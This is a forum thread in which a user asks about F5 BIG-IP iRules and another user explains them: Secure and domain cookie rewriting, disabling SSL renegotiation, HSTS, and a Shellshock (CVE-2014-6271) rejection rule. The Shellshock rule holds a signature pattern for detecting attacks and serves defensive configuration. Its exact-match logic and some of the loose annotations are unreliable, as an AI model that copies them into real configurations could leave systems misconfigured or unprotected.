Forum Discussion
NimbostratusCan somebody help me understand the below Irules for Secure Cookies,
Number 1 rule for Secure Cookies:
ltm rule SPOG-Secure-Cookies { partition SKP when HTTP_RESPONSE { set myValues [HTTP::cookie names] foreach mycookies $myValues { HTTP::cookie secure $mycookies enable } } }
========================================================================================= Number two rule:
ltm rule SPOG-Domain-Cookies-IMC.com { partition SKP when HTTP_RESPONSE { log local0. "[IP::client_addr]:[TCP::client_port]: Pre Set-Cookies: [HTTP::header values Set-Cookie]" Check if the persistence cookie exists in the response if {[HTTP::cookie exists "PD-L-SESSION"]} { set the domain attribute on the persistence cookie HTTP::cookie domain "PD-L-SESSION" ".ironmountainconnect.com" log local0. "[IP::client_addr]:[TCP::client_port]: Modified domain on PD-L-SESSION" } if {[HTTP::cookie exists "PD-L-LAT"]} { set the domain attribute on the persistence cookie HTTP::cookie domain "PD-L-LAT" ".ironmountainconnect.com" log local0. "[IP::client_addr]:[TCP::client_port]: Modified domain on PD-L-LAT" } log local0. "[IP::client_addr]:[TCP::client_port]: Post Set-Cookies: [HTTP::header values Set-Cookie]" } }
4 Replies
Samir_Jha_52506Noctilucent
Hi, Find the below details. Please correct me if any thing wrong.
ltm rule SPOG-Secure-Cookies --> Name of irule { partition SKP when HTTP_RESPONSE --> Partision name SKP, where iRule stored { set myValues [HTTP::cookie names] ---> storing cookie value in "myValues" varible foreach mycookies $myValues ---> passing 'myValues' value in mycookies one by one through loop { HTTP::cookie secure $mycookies enable --> enabling cookie in browser } } } ltm rule SPOG-Domain-Cookies-IMC.com --> Name of irule { partition SKP when HTTP_RESPONSE --> Partision name SKP, where iRule stored { log local0. "[IP::client_addr]:[TCP::client_port]: Pre Set-Cookies: [HTTP::header values Set-Cookie]" --> log message "client IP:port": Header cookie values Check if the persistence cookie exists in the response if {[HTTP::cookie exists "PD-L-SESSION"]} ---> Checks cookie value { set the domain attribute on the persistence cookie HTTP::cookie domain "PD-L-SESSION" ".ironmountainconnect.com" --> adding cookie value in "ironmountainconnect.com" log local0. "[IP::client_addr]:[TCP::client_port]: Modified domain on PD-L-SESSION" } --> log message "client IP:port" Modified domain on PD-L-SESSION" if {[HTTP::cookie exists "PD-L-LAT"]} ---> Checks cookie value { set the domain attribute on the persistence cookie HTTP::cookie domain "PD-L-LAT" ".ironmountainconnect.com" --> adding cookie value in "ironmountainconnect.com" log local0. "[IP::client_addr]:[TCP::client_port]: Modified domain on PD-L-LAT" } --> log message "client IP:port":Modified domain on PD-L-LAT" log local0. "[IP::client_addr]:[TCP::client_port]: Post Set-Cookies: [HTTP::header values Set-Cookie]" } } --> log message": Post Set-Cookies: PD-L-LAT"
dipta_03_149731Thanks for the quick response Samir. Yes above solution is correct And I could find the resuld in my tcp dump result. Could yu also tel me meaning for below irules and why we should use them:
1. ltm rule SSL-Renegotatiation-disabled { when CLIENTSSL_HANDSHAKE priority 1 { SSL::renegotiate disable }
}2. didey@(kan-qa-vf5-a)(cfg-sync In Sync)(Active)(/Common)(tmos) list ltm rule Shellshock_reject ltm rule Shellshock_reject { when HTTP_REQUEST { set pattern "() {"; if { [string match $pattern [HTTP::uri]] } { log local0. "Detected CVE-2014-6271 attack from '[IP::client_addr]' in URI '[HTTP::uri]'"; reject; } else { foreach header_name [HTTP::header names] { foreach header_value [HTTP::header values $header_name] { if { [string match $pattern $header_value] } { log local0. "Detected CVE-2014-6271 attack from '[IP::client_addr]' in HTTP Header $header_name = '$header_value'; URI = '[HTTP::uri]'"; reject; break;
}3. ltm rule HSTS-iRule { when HTTP_RESPONSE { HTTP::header insert Strict-Transport-Security "max-age=31536000; includeSubDomains" } }
- Samir_Jha_52506
- ltm rule SSL-Renegotatiation-disabled { when CLIENTSSL_HANDSHAKE priority 1 { SSL::renegotiate disable }
Enable or disable the ability for the peer to request renegotiation. Renegotiation is enabled by default in BIG-IP versions prior to 10.1.0. When disabled, the peer is not allowed to request SSL renegotiation. Disabling SSL renegotiation can be used to prevent SSL injection vulnerability in applications which do not require SSL renegotiation.
2. didey@(kan-qa-vf5-a)(cfg-sync In Sync)(Active)(/Common)(tmos) list ltm rule Shellshock_rejectltm rule Shellshock_reject ---> rune name { when HTTP_REQUEST { set pattern "() {"; if { [string match $pattern [HTTP::uri]] } { log local0. "Detected CVE-2014-6271 attack from '[IP::client_addr]' in URI '[HTTP::uri]'"; reject; } else { foreach header_name [HTTP::header names] { foreach header_value [HTTP::header values $header_name] { if { [string match $pattern $header_value] } { log local0. "Detected CVE-2014-6271 attack from '[IP::client_addr]' in HTTP Header $header_name = '$header_value'; URI = '[HTTP::uri]'"; reject; break;
This rule is basically to match certain pattern & reject connection in VIP
- ltm rule HSTS-iRule { when HTTP_RESPONSE { HTTP::header insert Strict-Transport-Security "max-age=31536000; includeSubDomains" } }
HTTP Strict Transport Security (HSTS) is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS. It also prevents HTTPS click through prompts on browsers.
- dipta_03_149731
Thanks a lot Samir for replying to all the queries. This is very much helpfull.
